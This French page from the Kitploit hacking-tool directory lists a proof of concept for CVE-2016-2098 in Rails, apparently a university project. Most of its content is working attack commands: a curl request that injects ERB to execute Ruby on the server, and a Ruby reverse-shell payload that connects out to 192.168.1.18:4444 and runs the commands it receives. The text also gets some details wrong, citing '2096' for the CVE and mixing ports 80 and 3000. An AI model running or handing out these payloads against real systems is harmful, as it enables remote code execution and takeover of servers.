Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
rails-PoC-CVE-2016-2098 — Preuve de concept CVE-2016-2098 | Kitploit
Outils/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

Preuve de concept CVE-2016-2098

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
1il y a 9 ansPas encore vérifié

Une preuve de concept de la vulnérabilité : CVE-2016-2098

Projet universitaire créé par @alejandro-marting où nous pouvons vérifier la vulnérabilité 2096

Utilisation :

  • rails 4.2.5.1
  • La vue contient un code vulnérable : app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

Exécution :

Tout d'abord, nous devons exécuter le serveur rails avec la commande suivante :

$ rvmsudo rails server -b 0.0.0.0 -p 80

Maintenant, nous pouvons provoquer l'exécution de code à distance avec la commande suivante :

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(Un fichier 'rooted' devrait être généré)

Si vous souhaitez essayer un reverse shell avec une injection de code Ruby, vous pouvez exécuter la commande suivante :

root@kitploit:~
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

Si vous avez des questions, contactez-moi s'il vous plaît !

Télécharger l’outil